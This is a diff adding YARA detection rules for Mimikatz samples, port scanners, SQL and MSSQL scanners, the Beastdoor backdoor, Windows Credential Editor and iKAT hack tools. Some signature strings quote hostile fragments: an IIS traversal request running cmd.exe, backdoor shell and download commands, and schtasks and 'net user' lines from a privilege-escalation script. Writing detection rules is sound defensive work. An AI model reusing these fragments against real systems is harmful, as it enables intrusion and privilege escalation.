+		$s1 = "getLiveSSP" fullword
+		$s2 = "getKerberos" fullword
+		$s3 = "getLiveSSPFunctions" fullword
+		$s4 = "getKerberosFunctions" fullword
+		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s6 = "getCredmanFunctions" fullword
+		$s7 = "getCredman" fullword
+		$s8 = "find_tokens" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_5 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "9ca015f05cc4cbae8d50bcd067e6d605"
+		score = 50
+	strings:
+		$s6 = "mimidrv.sys" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_6 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "739c80bac405eb1b0ebbe10a75515ff1"
+	strings:
+		$s1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s2 = "Erreur : impossible d'ouvrir le bureau cible (" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_7 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "821e5dc1ad4bbad2958e036c84bf7734"
+		hash1 = "e39e57fb7ff38e7be1a8da785ef83557"
+		hash2 = "9ecb8020b0989778009d5aaf13640ea4"
+		hash3 = "4bfe2b27a63678fa6b4bd27c8d309508"
+		hash4 = "fb164aadc2ae4a7aa3fc3f54cd8fa92a"
+		hash5 = "33786d2823e6d5e75b1a3a8bb2837b40"
+		hash6 = "a4c1feb5f3f5a71320aeca588cb1f14c"
+		hash7 = "36fc962a871cfb9f7d31dc9faaab5b54"
+		hash8 = "35bc4af0cbaa48e8a72884e3e690fc3b"
+		hash9 = "f1de7a81394efe6cc9438033a75cae0d"
+		hash10 = "a6e0cf20f2de5149885297188644f123"
+		hash11 = "bb7d4174e9ffae01a14993c528de8653"
+		hash12 = "ffd3df1ee7bfd6f1255221c3f82478f1"
+		hash13 = "eaf8dfbe80c42dd92740a9e71ea444ab"
+		hash14 = "e25b75621c03da7addc55dac378d77c4"
+		hash15 = "41ea9b05bcfceca78d51f776bfdee393"
+		hash16 = "a03a4272be8a2ee5e48ba2c417ff3b5b"
+		hash17 = "96501f7e9dc19a4012b1f5db1dce7018"
+		hash18 = "b6fe1b2e961c294155d8f48b6c57f28f"
+		hash19 = "1680c6afebcb77a21b6619aedc304931"
+		hash20 = "46820c90b2fb296e26b4bb8f7cad51ac"
+		hash21 = "a21634571795601f5eace5d503246b3b"
+		hash22 = "e6dda29f842ce3b7c72b5536fab4f860"
+		hash23 = "006480db3303a7ba9d73e32bc6c0bc11"
+		hash24 = "efa68dd73410c4be6f6b0a95a02762f2"
+		hash25 = "7194944aa418851631d7e614ff430b0a"
+		hash26 = "3a98b9190bf6ed5f75d9c3950a63dd08"
+		hash27 = "02f7536279480b73c9942c072c1b5316"
+		hash28 = "8638370c805dc92581eba34fa57eb45e"
+		hash29 = "6f393ab258b87790a45d6d2b125bbc24"
+		hash30 = "dbb01a015ab11266bae5d6381ffd41c2"
+		score = 80
+	strings:
+		$s0 = "#         * Kernel mode *         #" fullword
+		$s1 = "kerberos!KerbGlobalLogonSessionTable" fullword
+		$s2 = "Authentication Id : %u ; %u (%08x:%08x)" fullword
+		$s3 = "%p - lsasrv!InitializationVector" fullword
+		$s4 = "%p - lsasrv!LogonSessionListCount" fullword
+		$s7 = "#          * User mode *          #" fullword
+		$s8 = "##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )"
+		$s9 = "livessp!LiveGlobalLogonSessionList" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_8 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "0a10fe0a341ac0b24347f183c83123cc"
+		hash1 = "d7e16bc11cdfc0f781e87f5df4ae24a5"
+		hash2 = "abdb41e32c447e703b03c9e307565ed3"
+		score = 40
+	strings:
+		$s0 = "?!?(?0?8?@?H?P?X?`?n?w?" fullword
+		$s1 = "2\"2'2.24292@2F2K2R2X2]2d2j2o2v2|2" fullword
+		$s2 = "7!7<7C7P7V7^7d7r7" fullword
+		$s3 = "0#0)0=0E0K0[0c0i0" fullword
+		$s4 = "878E8L8Y8`8f8l8r8" fullword
+		$s5 = ":*:/:7:=:B:I:O:T:[:a:f:m:s:x:" fullword
+		$s6 = "<'<4<9<D<K<Q<X<e<j<u<{<" fullword
+		$s7 = "8&878?8M8R8]8d8q8~8" fullword
+		$s8 = ";,;2;A;F;L;_;d;k;q;" fullword
+		$s9 = "3%3+31373=3C3I3N3_3s3" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_9 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "6e2eda476c141c63ff62c92d8b52ff7e"
+		hash1 = "f42b75103230cab39e4c58d5b0dca2c4"
+		hash2 = "dc6f62e3a0b584cb134633a12fd7d7b8"
+		hash3 = "d5918d735a23f746f0e83f724c4f26e5"
+		hash4 = "e98b714ccd14e61f776cc55a602d2dd0"
+		hash5 = "09a6e5cc589a485d9ab4eda772b46f2a"
+		hash6 = "4a51faef37af8b70fc9cf7c64f030b25"
+		hash7 = "e52e30811287426d4eef089a65cc2acf"
+		hash8 = "cd1606a1800150a33dea71d3f3ee9aed"
+		hash9 = "510fe825464dca92aadcd3d8289405aa"
+		hash10 = "0be87e16eb598006358cdaa9dfcd5af5"
+		hash11 = "1f0ce022ee9fe8d92235809eda73ce38"
+		hash12 = "e172a38ade3aa0a2bc1bf9604a54a3b5"
+		hash13 = "de20bddb9c3b1b09d980db5bbb5b5789"
+		hash14 = "c77db1ddffc7e6edac60bb5ca9a6e863"
+		hash15 = "6d8008edd86c5ca1a112018852777b1e"
+		hash16 = "525d6ca1446b01f912303f04f0c713ab"
+		score = 70
+	strings:
+		$s6 = "\\i386\\mimidrv.pdb"
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_10 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "5522fd8fe2e205b30f9e74a94da0352d"
+		hash1 = "ec428ed7d1cc4ba3023696ddc138a376"
+		hash2 = "13e88493f844a0df3352cd721bfa41a6"
+		hash3 = "483e5365e1f1d83c2dcd4bdb398e779f"
+		hash4 = "04d04a1f0ff9e2ff1d35b8c2950cce53"
+		hash5 = "97cbbd6c4153ae4a410439e2c02d77ce"
+		hash6 = "b43dfc8be8db7eacfc993e323229fb9f"
+		hash7 = "72e95180a2e4ab59e1b7c10f1054740a"
+		hash8 = "eaaecd5bd100923c72d2b39d84dfd411"
+		hash9 = "a8ae792f0384fd3e7f411c826b48b7c8"
+		score = 40
+	strings:
+		$s0 = "D$hL9(t" fullword
+		$s1 = "l$LfD9o" fullword
+		$s2 = "AHH90t?L" fullword
+		$s3 = "M9Qpv\"I9Ips" fullword
+		$s4 = "tSD8T$<u" fullword
+		$s5 = ";f9T$Xw" fullword
+		$s6 = "6f9L$Xw" fullword
+		$s7 = "f;\\$@u1E3" fullword
+		$s8 = "8\\$8uFH" fullword
+		$s9 = "L$DfD;O" fullword
+	condition:
+		all of them
+}
+
+/* Removed Mimikatz samples set super rules 11 - 27 */
+
+/* Disclosed hack tool set */
+
+rule Fierce2
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Fierce2 domain scanner"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+	condition:
+		1 of them
+}
+
+rule Ncrack
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Ncrack brute force tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+	condition:
+		1 of them
+}
+
+rule SQLMap
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the SQLMap SQL injection tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "except SqlmapBaseException, ex:"
+	condition:
+		1 of them
+}
+
+rule PortScanner {
+	meta:
+		description = "Auto-generated rule on file PortScanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "b381b9212282c0c650cb4b0323436c63"
+	strings:
+		$s0 = "Scan Ports Every"
+		$s3 = "Scan All Possible Ports!"
+	condition:
+		all of them
+}
+
+rule DomainScanV1_0 {
+	meta:
+		description = "Auto-generated rule on file DomainScanV1_0.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+	strings:
+		$s0 = "dIJMuX$aO-EV"
+		$s1 = "XELUxP\"-\\"
+		$s2 = "KaR\"U'}-M,."
+		$s3 = "V.)\\ZDxpLSav"
+		$s4 = "Decompress error"
+		$s5 = "Can't load library"
+		$s6 = "Can't load function"
+		$s7 = "com0tl32:.d"
+	condition:
+		all of them
+}
+
+rule MooreR_Port_Scanner {
+	meta:
+		description = "Auto-generated rule on file MooreR Port Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "376304acdd0b0251c8b19fea20bb6f5b"
+	strings:
+		$s0 = "Description|"
+		$s3 = "soft Visual Studio\\VB9yp"
+		$s4 = "adj_fptan?4"
+		$s7 = "DOWS\\SyMem32\\/o"
+	condition:
+		all of them
+}
+
+rule NetBIOS_Name_Scanner {
+	meta:
+		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+	strings:
+		$s0 = "IconEx"
+		$s2 = "soft Visual Stu"
+		$s4 = "NBTScanner!y&"
+	condition:
+		all of them
+}
+
+rule FeliksPack3___Scanners_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+	strings:
+		$s2 = "WCAP;}ECTED"
+		$s4 = "NotSupported"
+		$s6 = "SCAN.VERSION{_"
+	condition:
+		all of them
+}
+
+rule CGISscan_CGIScan {
+	meta:
+		description = "Auto-generated rule on file CGIScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "338820e4e8e7c943074d5a5bc832458a"
+	strings:
+		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+		$s3 = "tcp is the only protocol supported thru socks server"
+		
+		$path1 = /filepath: .{,70}EPO.{,70}\n/
+	condition:
+		$s2 and $s3 and not $path1
+}
+
+rule IP_Stealing_Utilities {
+	meta:
+		description = "Auto-generated rule on file IP Stealing Utilities.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
+	strings:
+		$s0 = "DarkKnight"
+		$s9 = "IPStealerUtilities"
+	condition:
+		all of them
+}
+
+rule SuperScan4 {
+	meta:
+		description = "Auto-generated rule on file SuperScan4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "78f76428ede30e555044b83c47bc86f0"
+	strings:
+		$s2 = " td class=\"summO1\">"
+		$s6 = "REM'EBAqRISE"
+		$s7 = "CorExitProcess'msc#e"
+	condition:
+		all of them
+
+}
+rule PortRacer {
+	meta:
+		description = "Auto-generated rule on file PortRacer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "2834a872a0a8da5b1be5db65dfdef388"
+	strings:
+		$s0 = "Auto Scroll BOTH Text Boxes"
+		$s4 = "Start/Stop Portscanning"
+		$s6 = "Auto Save LogFile by pressing STOP"
+	condition:
+		all of them
+}
+
+rule scanarator {
+	meta:
+		description = "Auto-generated rule on file scanarator.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "848bd5a518e0b6c05bd29aceb8536c46"
+	strings:
+		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+	condition:
+		all of them
+}
+
+rule aolipsniffer {
+	meta:
+		description = "Auto-generated rule on file aolipsniffer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "51565754ea43d2d57b712d9f0a3e62b8"
+	strings:
+		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+		$s1 = "dwGetAddressForObject"
+		$s2 = "Color Transfer Settings"
+		$s3 = "FX Global Lighting Angle"
+		$s4 = "Version compatibility info"
+		$s5 = "New Windows Thumbnail"
+		$s6 = "Layer ID Generator Base"
+		$s7 = "Color Halftone Settings"
+		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+	condition:
+		all of them
+}
+
+rule _Bitchin_Threads_ {
+	meta:
+		description = "Auto-generated rule on file =Bitchin Threads=.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+	strings:
+		$s0 = "DarKPaiN"
+		$s1 = "=BITCHIN THREADS"
+	condition:
+		all of them
+}
+
+rule cgis4_cgis4 {
+	meta:
+		description = "Auto-generated rule on file cgis4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "d658dad1cd759d7f7d67da010e47ca23"
+	strings:
+		$s0 = ")PuMB_syJ"
+		$s1 = "&,fARW>yR"
+		$s2 = "m3hm3t_rullaz"
+		$s3 = "7Projectc1"
+		$s4 = "Ten-GGl\""
+		$s5 = "/Moziqlxa"
+	condition:
+		all of them
+}
+
+rule portscan {
+	meta:
+		description = "Auto-generated rule on file portscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "a8bfdb2a925e89a281956b1e3bb32348"
+	strings:
+		$s5 = "0    :SCAN BEGUN ON PORT:"
+		$s6 = "0    :PORTSCAN READY."
+	condition:
+		all of them
+}
+
+rule ProPort_zip_Folder_ProPort {
+	meta:
+		description = "Auto-generated rule on file ProPort.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+	strings:
+		$s0 = "Corrupt Data!"
+		$s1 = "K4p~omkIz"
+		$s2 = "DllTrojanScan"
+		$s3 = "GetDllInfo"
+		$s4 = "Compressed by Petite (c)1999 Ian Luck."
+		$s5 = "GetFileCRC32"
+		$s6 = "GetTrojanNumber"
+		$s7 = "TFAKAbout"
+	condition:
+		all of them
+}
+
+rule StealthWasp_s_Basic_PortScanner_v1_2 {
+	meta:
+		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+	strings:
+		$s1 = "Basic PortScanner"
+		$s6 = "Now scanning port:"
+	condition:
+		all of them
+}
+
+rule BluesPortScan {
+	meta:
+		description = "Auto-generated rule on file BluesPortScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6292f5fc737511f91af5e35643fc9eef"
+	strings:
+		$s0 = "This program was made by Volker Voss"
+		$s1 = "JiBOo~SSB"
+	condition:
+		all of them
+}
+
+rule scanarator_iis {
+	meta:
+		description = "Auto-generated rule on file iis.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+	strings:
+		$s0 = "example: iis 10.10.10.10"
+		$s1 = "send error"
+	condition:
+		all of them
+}
+
+rule stealth_Stealth {
+	meta:
+		description = "Auto-generated rule on file Stealth.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+	strings:
+		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+		$s6 = "This tool may be used only by system administrators. I am not responsible for "
+	condition:
+		all of them
+}
+
+rule Angry_IP_Scanner_v2_08_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "70cf2c09776a29c3e837cb79d291514a"
+	strings:
+		$s0 = "_H/EnumDisplay/"
+		$s5 = "ECTED.MSVCRT0x"
+		$s8 = "NotSupported7"
+	condition:
+		all of them
+}
+
+rule crack_Loader {
+	meta:
+		description = "Auto-generated rule on file Loader.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+	strings:
+		$s0 = "NeoWait.exe"
+		$s1 = "RRRRRRRW"
+	condition:
+		all of them
+}
+
+rule CN_GUI_Scanner {
+	meta: 
+		description = "Detects an unknown GUI scanner tool - CN background"
+		author = "Florian Roth"
+		hash = "3c67bbb1911cdaef5e675c56145e1112"
+		score = 65
+		date = "04.10.2014"
+	strings:
+		$s1 = "good.txt" fullword ascii
+		$s2 = "IP.txt" fullword ascii
+		$s3 = "xiaoyuer" fullword ascii
+		$s0w = "ssh(" fullword wide
+		$s1w = ").exe" fullword wide
+	condition:
+		all of them
+}	
+
+rule CN_Packed_Scanner {
+	meta: 
+		description = "Suspiciously packed executable"
+		author = "Florian Roth"
+		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+		score = 40
+		date = "06.10.2014"
+	strings:
+		$s1 = "kernel32.dll" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "__GetMainArgs" fullword ascii
+		$s4 = "WS2_32.DLL" fullword ascii
+	condition:
+		all of them and filesize < 180KB and filesize > 70KB
+}
+
+rule Tiny_Network_Tool_Generic {
+	meta:
+		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+		author = "Florian Roth"
+		date = "08.10.2014"
+		score = 40
+		type = "file"
+		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+		hash1 = "cafc31d39c1e4721af3ba519759884b9"
+		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+	strings:
+		$magic	= { 4d 5a }
+	
+		$s0 = "KERNEL32.DLL" fullword ascii
+		$s1 = "CRTDLL.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+
+		$y1 = "WININET.DLL" fullword ascii
+		$y2 = "atoi" fullword ascii
+		
+		$x1 = "ADVAPI32.DLL" fullword ascii
+		$x2 = "USER32.DLL" fullword ascii
+		$x3 = "wsock32.dll" fullword ascii
+		$x4 = "FreeSid" fullword ascii
+		$x5 = "atoi" fullword ascii
+
+		$z1 = "ADVAPI32.DLL" fullword ascii
+		$z2 = "USER32.DLL" fullword ascii
+		$z3 = "FreeSid" fullword ascii
+		$z4 = "ToAscii" fullword ascii
+		
+	condition:
+		( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB
+}
+
+rule Beastdoor_Backdoor {
+	meta:
+		description = "Detects the backdoor Beastdoor"
+		author = "Florian Roth"
+		score = 55
+		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
+		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
+		$s7 = "Host: wwp.mirabilis.com:80" fullword
+		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
+		$s11 = "Shell                            -->Get A Shell" fullword
+		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
+	condition:
+		2 of them
+}
+
+rule Powershell_Netcat {
+	meta:
+		description = "Detects a Powershell version of the Netcat network hacking tool"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+	strings:
+		$s0 = "[ValidateRange(1, 65535)]" fullword
+		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+	condition:
+		all of them
+}
+
+rule Chinese_Hacktool_1014 {
+	meta:
+		description = "Detects a chinese hacktool with unknown use"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+		hash = "98c07a62f7f0842bcdbf941170f34990"
+	strings:
+		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+		$s1 = "msctls_progress32" fullword wide
+		$s2 = "Reply-To: %s" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "html htm htx asp" fullword ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_BAT_PortsOpen {
+	meta:
+		description = "Detects a chinese BAT hacktool for local port evaluation"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+		$s2 = "@echo off" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_SSPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named SSPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "Golden Fox" fullword wide
+		$s1 = "Syn Scan Port" fullword wide
+		$s2 = "CZ88.NET" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_ScanPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named ScanPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "LScanPort" fullword wide
+		$s1 = "LScanPort Microsoft" fullword wide
+		$s2 = "www.yupsoft.com" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_S_EXE_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named s.exe"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "\\Result.txt" fullword ascii
+		$s1 = "By:ZT QQ:376789051" fullword ascii
+		$s2 = "(http://www.eyuyan.com)" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_BAT {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_Scanner {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "Bf **************" ascii fullword
+		$s1 = "forming Time: %d/" ascii
+		$s2 = "KERNEL32.DLL" ascii fullword
+		$s3 = "CRTDLL.DLL" ascii fullword
+		$s4 = "WS2_32.DLL" ascii fullword
+		$s5 = "GetProcAddress" ascii fullword
+		$s6 = "atoi" ascii fullword
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_1433_Scanner {
+	meta:
+		description = "Detects a chinese MSSQL scanner"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "del Weak1.txt" ascii fullword
+		$s3 = "del Attack.txt" ascii fullword
+		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii
+		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule CN_Hacktool_1433_Scanner_Comp2 {
+	meta:
+		description = "Detects a chinese MSSQL scanner - component 2"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule WCE_Modified_1_1014 {
+	meta:
+		description = "Modified (packed) version of Windows Credential Editor"
+		author = "Florian Roth"
+		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+		score = 70
+	strings:
+		$s0 = "LSASS.EXE" fullword ascii
+		$s1 = "_CREDS" ascii
+		$s9 = "Using WCE " ascii
+	condition:
+		all of them
+}
+
+rule ReactOS_cmd_valid {
+	meta:
+		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
+		score = 30
+		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
+	strings:
+		$s1 = "ReactOS Command Processor" fullword wide
+		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
+		$s3 = "Eric Kohl and others" fullword wide
+		$s4 = "ReactOS Operating System" fullword wide
+	condition:
+		all of ($s*)
+}
+
+rule iKAT_wmi_rundll {
+	meta:
+		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+	strings:
+		$s0 = "This operating system is not supported." fullword ascii
+		$s1 = "Error!" fullword ascii
+		$s2 = "Win32 only!" fullword ascii
+		$s3 = "COMCTL32.dll" fullword ascii
+		$s4 = "[LordPE]" ascii
+		$s5 = "CRTDLL.dll" fullword ascii
+		$s6 = "VBScript" fullword ascii
+		$s7 = "CoUninitialize" fullword ascii
+	condition:
+		all of them and filesize < 15KB
+}
+
+rule iKAT_revelations {
+	meta:
+		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+	strings:
+		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+		$s8 = "BETAsupport@snadboy.com" fullword wide
+		$s9 = "support@snadboy.com" fullword wide
+		$s14 = "RevelationHelper.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_priv_esc_tasksch {
+	meta:
+		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75		
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+	strings:
+		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii		
+		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+	condition:
+		2 of them
+}
+
+rule iKAT_command_lines_agent {
+	meta:
+		description = "iKAT hack tools set agent - file ikat.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75		
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+	strings:
+		$s0 = "Extended Module: super mario brothers" fullword ascii
+		$s1 = "Extended Module: " fullword ascii
+		$s3 = "ofpurenostalgicfeeling" fullword ascii
+		$s8 = "-supermariobrotheretic" fullword ascii
+		$s9 = "!http://132.147.96.202:80" fullword ascii
+		$s12 = "iKAT Exe Template" fullword ascii
+		$s15 = "withadancyflavour.." fullword ascii
+		$s16 = "FastTracker v2.00   " fullword ascii
+	condition:
+		4 of them
+}
+
+rule iKAT_cmd_as_dll {
+	meta:
+		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+	strings:
